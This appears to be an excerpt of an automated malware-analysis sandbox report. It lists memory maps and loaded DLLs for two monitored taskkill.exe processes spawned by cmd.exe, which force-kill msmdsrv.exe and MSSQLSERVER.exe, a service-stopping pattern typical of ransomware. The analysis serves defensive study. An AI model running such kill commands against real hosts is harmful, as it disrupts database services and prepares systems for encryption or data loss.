| pagefile_0x00000000000c0000 | 0x000c0000 | 0x000c0fff | Pagefile Backed Memory | Readable |
|
|
|
|
| private_0x00000000000d0000 | 0x000d0000 | 0x0010ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000160000 | 0x00160000 | 0x0019ffff | Private Memory | Readable, Writable |
|
|
|
|
| locale.nls | 0x001a0000 | 0x00206fff | Memory Mapped File | Readable |
|
|
|
|
| private_0x0000000000210000 | 0x00210000 | 0x0024ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000280000 | 0x00280000 | 0x002fffff | Private Memory | Readable, Writable |
|
|
|
|
| kernelbase.dll.mui | 0x00300000 | 0x003bffff | Memory Mapped File | Readable, Writable |
|
|
|
|
| private_0x00000000003e0000 | 0x003e0000 | 0x004dffff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x00000000004e0000 | 0x004e0000 | 0x00667fff | Pagefile Backed Memory | Readable |
|
|
|
|
| private_0x00000000006a0000 | 0x006a0000 | 0x006affff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x00000000006b0000 | 0x006b0000 | 0x00830fff | Pagefile Backed Memory | Readable |
|
|
|
|
| private_0x0000000000840000 | 0x00840000 | 0x0087ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000880000 | 0x00880000 | 0x008bffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000920000 | 0x00920000 | 0x0095ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x00000000009b0000 | 0x009b0000 | 0x009effff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000a00000 | 0x00a00000 | 0x00a3ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000a70000 | 0x00a70000 | 0x00aaffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000ac0000 | 0x00ac0000 | 0x00afffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000b30000 | 0x00b30000 | 0x00b6ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000b70000 | 0x00b70000 | 0x00baffff | Private Memory | Readable, Writable |
|
|
|
|
| taskkill.exe | 0x00c30000 | 0x00c45fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| pagefile_0x0000000000c50000 | 0x00c50000 | 0x0204ffff | Pagefile Backed Memory | Readable |
|
|
|
|
| private_0x0000000002050000 | 0x02050000 | 0x0214ffff | Private Memory | Readable, Writable |
|
|
|
|
| sortdefault.nls | 0x02150000 | 0x0241efff | Memory Mapped File | Readable |
|
|
|
|
| ntdsapi.dll | 0x6a490000 | 0x6a4a7fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| fastprox.dll | 0x6a4b0000 | 0x6a545fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| winsta.dll | 0x6a550000 | 0x6a578fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| wbemcomn.dll | 0x6a580000 | 0x6a5dbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| wbemsvc.dll | 0x6a710000 | 0x6a71efff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| wbemprox.dll | 0x6a720000 | 0x6a729fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| dbghelp.dll | 0x6a7b0000 | 0x6a89afff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| wkscli.dll | 0x6a8a0000 | 0x6a8aefff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| netapi32.dll | 0x6a8b0000 | 0x6a8c0fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| wtsapi32.dll | 0x6a8d0000 | 0x6a8dcfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| framedynos.dll | 0x6a8e0000 | 0x6a914fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| mpr.dll | 0x73ba0000 | 0x73bb1fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| netutils.dll | 0x73e30000 | 0x73e38fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| wow64cpu.dll | 0x73fd0000 | 0x73fd7fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| wow64win.dll | 0x73fe0000 | 0x7403bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| wow64.dll | 0x74040000 | 0x7407efff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| secur32.dll | 0x74080000 | 0x74087fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| rsaenh.dll | 0x74460000 | 0x7449afff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| rpcrtremote.dll | 0x749d0000 | 0x749ddfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| cryptsp.dll | 0x749e0000 | 0x749f5fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| version.dll | 0x74b50000 | 0x74b58fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| srvcli.dll | 0x75330000 | 0x75348fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| cryptbase.dll | 0x753f0000 | 0x753fbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| sspicli.dll | 0x75400000 | 0x7545ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| msvcrt.dll | 0x755a0000 | 0x7564bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| advapi32.dll | 0x763f0000 | 0x7648ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| clbcatq.dll | 0x76490000 | 0x76512fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| kernel32.dll | 0x76520000 | 0x7662ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| rpcrt4.dll | 0x76690000 | 0x7677ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| shlwapi.dll | 0x76780000 | 0x767d6fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| imm32.dll | 0x767e0000 | 0x7683ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| oleaut32.dll | 0x76910000 | 0x7699efff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| sechost.dll | 0x769a0000 | 0x769b8fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| nsi.dll | 0x76c80000 | 0x76c85fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| usp10.dll | 0x76c90000 | 0x76d2cfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| ole32.dll | 0x76d30000 | 0x76e8bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| lpk.dll | 0x76ea0000 | 0x76ea9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| ws2_32.dll | 0x77130000 | 0x77164fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| msctf.dll | 0x771f0000 | 0x772bbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| kernelbase.dll | 0x772c0000 | 0x77305fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| user32.dll | 0x77310000 | 0x7740ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| gdi32.dll | 0x77410000 | 0x7749ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| private_0x00000000774a0000 | 0x774a0000 | 0x77599fff | Private Memory | Readable, Writable, Executable |
|
|
|
|
| private_0x00000000775a0000 | 0x775a0000 | 0x776befff | Private Memory | Readable, Writable, Executable |
|
|
|
|
| ntdll.dll | 0x776c0000 | 0x77868fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| ntdll.dll | 0x778a0000 | 0x77a1ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| private_0x000000007efaa000 | 0x7efaa000 | 0x7efacfff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x000000007efad000 | 0x7efad000 | 0x7efaffff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x000000007efb0000 | 0x7efb0000 | 0x7efd2fff | Pagefile Backed Memory | Readable |
|
|
|
|
| private_0x000000007efd5000 | 0x7efd5000 | 0x7efd7fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x000000007efd8000 | 0x7efd8000 | 0x7efdafff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x000000007efdb000 | 0x7efdb000 | 0x7efddfff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x000000007efde000 | 0x7efde000 | 0x7efdefff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x000000007efdf000 | 0x7efdf000 | 0x7efdffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x000000007efe0000 | 0x7efe0000 | 0x7ffdffff | Private Memory | Readable |
|
|
|
|
| pagefile_0x000000007efe0000 | 0x7efe0000 | 0x7f0dffff | Pagefile Backed Memory | Readable |
|
|
|
|
| private_0x000000007f0e0000 | 0x7f0e0000 | 0x7ffdffff | Private Memory | Readable |
|
|
|
|
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | Readable |
|
|
|
|
| private_0x000000007fff0000 | 0x7fff0000 | 0x7fffffeffff | Private Memory | Readable |
|
|
|
|
| Information | Value |
|---|---|
| ID | #26 |
| File Name | c:\windows\syswow64\taskkill.exe |
| Command Line | TASKKILL /F /IM msmdsrv.exe /IM msmdsrv.exe |
| Initial Working Directory | C:\Users\kFT6uTQW\Desktop\ |
| Monitor | Start Time: 00:01:27, Reason: Child Process |
| Unmonitor | End Time: 00:02:35, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:08 |
| Remarks | No high level activity detected in monitored regions |
| Information | Value |
|---|---|
| PID | 0xa18 |
| Parent PID | 0xbb0 (c:\windows\syswow64\cmd.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | XABNCPUWKW\kFT6uTQW |
| Groups |
|
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
600
0x
5F8
0x
634
0x
510
0x
68C
|
| Name | Start VA | End VA | Type | Permissions | Monitored | Dump | YARA Match | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | Readable, Writable |
|
|
|
|
| pagefile_0x0000000000020000 | 0x00020000 | 0x0002ffff | Pagefile Backed Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000030000 | 0x00030000 | 0x00031fff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x0000000000030000 | 0x00030000 | 0x00036fff | Pagefile Backed Memory | Readable |
|
|
|
|
| apisetschema.dll | 0x00040000 | 0x00040fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| pagefile_0x0000000000050000 | 0x00050000 | 0x00053fff | Pagefile Backed Memory | Readable |
|
|
|
|
| pagefile_0x0000000000060000 | 0x00060000 | 0x00060fff | Pagefile Backed Memory | Readable |
|
|
|
|
| locale.nls | 0x00070000 | 0x000d6fff | Memory Mapped File | Readable |
|
|
|
|
| pagefile_0x00000000000e0000 | 0x000e0000 | 0x000e1fff | Pagefile Backed Memory | Readable, Writable |
|
|
|
|
| taskkill.exe.mui | 0x000f0000 | 0x000f3fff | Memory Mapped File | Readable, Writable |
|
|
|
|
| private_0x0000000000100000 | 0x00100000 | 0x00100fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000110000 | 0x00110000 | 0x00110fff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x0000000000120000 | 0x00120000 | 0x00120fff | Pagefile Backed Memory | Readable |
|
|
|
|
| private_0x0000000000130000 | 0x00130000 | 0x0016ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000170000 | 0x00170000 | 0x001affff | Private Memory | Readable, Writable |
|
|
|
|
| kernelbase.dll.mui | 0x001b0000 | 0x0026ffff | Memory Mapped File | Readable, Writable |
|
|
|
|
| pagefile_0x0000000000270000 | 0x00270000 | 0x00270fff | Pagefile Backed Memory | Readable |
|
|
|
|
| private_0x00000000002d0000 | 0x002d0000 | 0x002dffff | Private Memory | Readable, Writable |
|
|
|
|
| taskkill.exe | 0x002f0000 | 0x00305fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| pagefile_0x0000000000310000 | 0x00310000 | 0x00497fff | Pagefile Backed Memory | Readable |
|
|
|
|
| private_0x00000000004a0000 | 0x004a0000 | 0x004dffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x00000000004e0000 | 0x004e0000 | 0x0055ffff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x0000000000560000 | 0x00560000 | 0x006e0fff | Pagefile Backed Memory | Readable |
|
|
|
|
| private_0x0000000000730000 | 0x00730000 | 0x0082ffff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x0000000000830000 | 0x00830000 | 0x01c2ffff | Pagefile Backed Memory | Readable |
|
|
|
|
| private_0x0000000001d00000 | 0x01d00000 | 0x01d3ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000001d50000 | 0x01d50000 | 0x01d8ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000001d90000 | 0x01d90000 | 0x01dcffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000001dd0000 | 0x01dd0000 | 0x01e0ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000001e10000 | 0x01e10000 | 0x01e4ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000001e50000 | 0x01e50000 | 0x01e8ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000001e90000 | 0x01e90000 | 0x01f8ffff | Private Memory | Readable, Writable |
|
|
|
|
| sortdefault.nls | 0x01f90000 | 0x0225efff | Memory Mapped File | Readable |
|
|
|
|
| private_0x0000000002270000 | 0x02270000 | 0x022affff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x00000000022c0000 | 0x022c0000 | 0x022fffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x00000000023c0000 | 0x023c0000 | 0x023fffff | Private Memory | Readable, Writable |
|
|
|
|
| fastprox.dll | 0x6a450000 | 0x6a4e5fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| dbghelp.dll | 0x6a4f0000 | 0x6a5dafff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| ntdsapi.dll | 0x6a7d0000 | 0x6a7e7fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| wbemsvc.dll | 0x6a7f0000 | 0x6a7fefff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| winsta.dll | 0x6a800000 | 0x6a828fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| wbemcomn.dll | 0x6a830000 | 0x6a88bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| wbemprox.dll | 0x6a890000 | 0x6a899fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| framedynos.dll | 0x6a8a0000 | 0x6a8d4fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| wkscli.dll | 0x6a8e0000 | 0x6a8eefff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| netutils.dll | 0x6a8f0000 | 0x6a8f8fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| netapi32.dll | 0x6a900000 | 0x6a910fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| mpr.dll | 0x73ba0000 | 0x73bb1fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| wtsapi32.dll | 0x73e30000 | 0x73e3cfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| wow64cpu.dll | 0x73fd0000 | 0x73fd7fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| wow64win.dll | 0x73fe0000 | 0x7403bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| wow64.dll | 0x74040000 | 0x7407efff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| secur32.dll | 0x74080000 | 0x74087fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| rsaenh.dll | 0x74460000 | 0x7449afff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| rpcrtremote.dll | 0x749d0000 | 0x749ddfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| cryptsp.dll | 0x749e0000 | 0x749f5fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| version.dll | 0x74b50000 | 0x74b58fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| srvcli.dll | 0x75330000 | 0x75348fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| cryptbase.dll | 0x753f0000 | 0x753fbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| sspicli.dll | 0x75400000 | 0x7545ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| msvcrt.dll | 0x755a0000 | 0x7564bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| advapi32.dll | 0x763f0000 | 0x7648ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| clbcatq.dll | 0x76490000 | 0x76512fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| kernel32.dll | 0x76520000 | 0x7662ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| rpcrt4.dll | 0x76690000 | 0x7677ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| shlwapi.dll | 0x76780000 | 0x767d6fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| imm32.dll | 0x767e0000 | 0x7683ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| oleaut32.dll | 0x76910000 | 0x7699efff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| sechost.dll | 0x769a0000 | 0x769b8fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| nsi.dll | 0x76c80000 | 0x76c85fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| usp10.dll | 0x76c90000 | 0x76d2cfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| ole32.dll | 0x76d30000 | 0x76e8bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| lpk.dll | 0x76ea0000 | 0x76ea9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| ws2_32.dll | 0x77130000 | 0x77164fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| msctf.dll | 0x771f0000 | 0x772bbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| kernelbase.dll | 0x772c0000 | 0x77305fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| user32.dll | 0x77310000 | 0x7740ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| gdi32.dll | 0x77410000 | 0x7749ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| private_0x00000000774a0000 | 0x774a0000 | 0x77599fff | Private Memory | Readable, Writable, Executable |
|
|
|
|
| private_0x00000000775a0000 | 0x775a0000 | 0x776befff | Private Memory | Readable, Writable, Executable |
|
|
|
|
| ntdll.dll | 0x776c0000 | 0x77868fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| ntdll.dll | 0x778a0000 | 0x77a1ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| private_0x000000007efaa000 | 0x7efaa000 | 0x7efacfff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x000000007efad000 | 0x7efad000 | 0x7efaffff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x000000007efb0000 | 0x7efb0000 | 0x7efd2fff | Pagefile Backed Memory | Readable |
|
|
|
|
| private_0x000000007efd5000 | 0x7efd5000 | 0x7efd7fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x000000007efd8000 | 0x7efd8000 | 0x7efdafff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x000000007efdb000 | 0x7efdb000 | 0x7efddfff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x000000007efde000 | 0x7efde000 | 0x7efdefff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x000000007efdf000 | 0x7efdf000 | 0x7efdffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x000000007efe0000 | 0x7efe0000 | 0x7ffdffff | Private Memory | Readable |
|
|
|
|
| pagefile_0x000000007efe0000 | 0x7efe0000 | 0x7f0dffff | Pagefile Backed Memory | Readable |
|
|
|
|
| private_0x000000007f0e0000 | 0x7f0e0000 | 0x7ffdffff | Private Memory | Readable |
|
|
|
|
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | Readable |
|
|
|
|
| private_0x000000007fff0000 | 0x7fff0000 | 0x7fffffeffff | Private Memory | Readable |
|
|
|
|
| Information | Value |
|---|---|
| ID | #27 |
| File Name | c:\windows\syswow64\taskkill.exe |
| Command Line | TASKKILL /F /IM MSSQLSERVER.exe /IM MSSQLSERVER.exe |
| Initial Working Directory | C:\Users\kFT6uTQW\Desktop\ |
| Monitor | Start Time: 00:01:27, Reason: Child Process |
| Unmonitor | End Time: 00:02:35, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:08 |
| Remarks | No high level activity detected in monitored regions |
| Information | Value |
|---|---|
| PID | 0x16c |
| Parent PID | 0xbb0 (c:\windows\syswow64\cmd.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | XABNCPUWKW\kFT6uTQW |
| Groups |
|
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
204
0x
23C
0x
238
0x
244
0x
2A4
|
| Name | Start VA | End VA | Type | Permissions | Monitored | Dump | YARA Match | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | Readable, Writable |
|
|
|
|
| pagefile_0x0000000000020000 | 0x00020000 | 0x0002ffff | Pagefile Backed Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000030000 | 0x00030000 | 0x00031fff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x0000000000030000 | 0x00030000 | 0x00036fff | Pagefile Backed Memory | Readable |
|
|
|
|
| apisetschema.dll | 0x00040000 | 0x00040fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| pagefile_0x0000000000050000 | 0x00050000 | 0x00053fff | Pagefile Backed Memory | Readable |
|
|
|
|
| pagefile_0x0000000000060000 | 0x00060000 | 0x00060fff | Pagefile Backed Memory | Readable |
|
|
|
|
| pagefile_0x0000000000070000 | 0x00070000 | 0x00071fff | Pagefile Backed Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000080000 | 0x00080000 | 0x0008ffff | Private Memory | Readable, Writable |
|
|
|
|
| taskkill.exe.mui | 0x00090000 | 0x00093fff | Memory Mapped File | Readable, Writable |
|
|
|
|
| private_0x00000000000a0000 | 0x000a0000 | 0x000a0fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x00000000000b0000 | 0x000b0000 | 0x000b0fff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x00000000000c0000 | 0x000c0000 | 0x000c0fff | Pagefile Backed Memory | Readable |
|
|
|
|
| private_0x00000000000d0000 | 0x000d0000 | 0x0010ffff | Private Memory | Readable, Writable |
|
|
|
|
| locale.nls | 0x00110000 | 0x00176fff | Memory Mapped File | Readable |
|
|
|
|
| pagefile_0x0000000000180000 | 0x00180000 | 0x00180fff | Pagefile Backed Memory | Readable |
|
|
|
|
| private_0x00000000001a0000 | 0x001a0000 | 0x001dffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000200000 | 0x00200000 | 0x0023ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000240000 | 0x00240000 | 0x002bffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x00000000002c0000 | 0x002c0000 | 0x002fffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000320000 | 0x00320000 | 0x0041ffff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x0000000000420000 | 0x00420000 | 0x005a7fff | Pagefile Backed Memory | Readable |
|
|
|
|
| pagefile_0x00000000005b0000 | 0x005b0000 | 0x00730fff | Pagefile Backed Memory | Readable |
|
|
|
|
| kernelbase.dll.mui | 0x00740000 | 0x007fffff | Memory Mapped File | Readable, Writable |
|
|
|
|
| private_0x0000000000800000 | 0x00800000 | 0x008fffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000930000 | 0x00930000 | 0x0096ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x00000000009a0000 | 0x009a0000 | 0x009dffff | Private Memory | Readable, Writable |
|
|
|
|
| sortdefault.nls | 0x009e0000 | 0x00caefff | Memory Mapped File | Readable |
|
|
|
|
| private_0x0000000000d50000 | 0x00d50000 | 0x00d8ffff | Private Memory | Readable, Writable |
|
|
|
|
| taskkill.exe | 0x00db0000 | 0x00dc5fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| pagefile_0x0000000000dd0000 | 0x00dd0000 | 0x021cffff | Pagefile Backed Memory | Readable |
|
|
|
|
| private_0x00000000021e0000 | 0x021e0000 | 0x0221ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x00000000022a0000 | 0x022a0000 | 0x022dffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000002380000 | 0x02380000 | 0x023bffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x00000000023f0000 | 0x023f0000 | 0x0242ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000002480000 | 0x02480000 | 0x024bffff | Private Memory | Readable, Writable |
|
|
|
|
| ntdsapi.dll | 0x6a4c0000 | 0x6a4d7fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| fastprox.dll | 0x6a4e0000 | 0x6a575fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| winsta.dll | 0x6a580000 | 0x6a5a8fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| wbemcomn.dll | 0x6a5b0000 | 0x6a60bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| wbemsvc.dll | 0x6a710000 | 0x6a71efff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| wbemprox.dll | 0x6a720000 | 0x6a729fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| dbghelp.dll | 0x6a7b0000 | 0x6a89afff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| wkscli.dll | 0x6a8a0000 | 0x6a8aefff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| netapi32.dll | 0x6a8b0000 | 0x6a8c0fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| wtsapi32.dll | 0x6a8d0000 | 0x6a8dcfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| framedynos.dll | 0x6a8e0000 | 0x6a914fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| mpr.dll | 0x73ba0000 | 0x73bb1fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| netutils.dll | 0x73e30000 | 0x73e38fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| wow64cpu.dll | 0x73fd0000 | 0x73fd7fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| wow64win.dll | 0x73fe0000 | 0x7403bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| wow64.dll | 0x74040000 | 0x7407efff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| secur32.dll | 0x74080000 | 0x74087fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| rsaenh.dll | 0x74460000 | 0x7449afff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| rpcrtremote.dll | 0x749d0000 | 0x749ddfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| cryptsp.dll | 0x749e0000 | 0x749f5fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| version.dll | 0x74b50000 | 0x74b58fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| srvcli.dll | 0x75330000 | 0x75348fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| cryptbase.dll | 0x753f0000 | 0x753fbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| sspicli.dll | 0x75400000 | 0x7545ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| msvcrt.dll | 0x755a0000 | 0x7564bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| advapi32.dll | 0x763f0000 | 0x7648ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| clbcatq.dll | 0x76490000 | 0x76512fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| kernel32.dll | 0x76520000 | 0x7662ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| rpcrt4.dll | 0x76690000 | 0x7677ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| shlwapi.dll | 0x76780000 | 0x767d6fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| imm32.dll | 0x767e0000 | 0x7683ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| oleaut32.dll | 0x76910000 | 0x7699efff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| sechost.dll | 0x769a0000 | 0x769b8fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
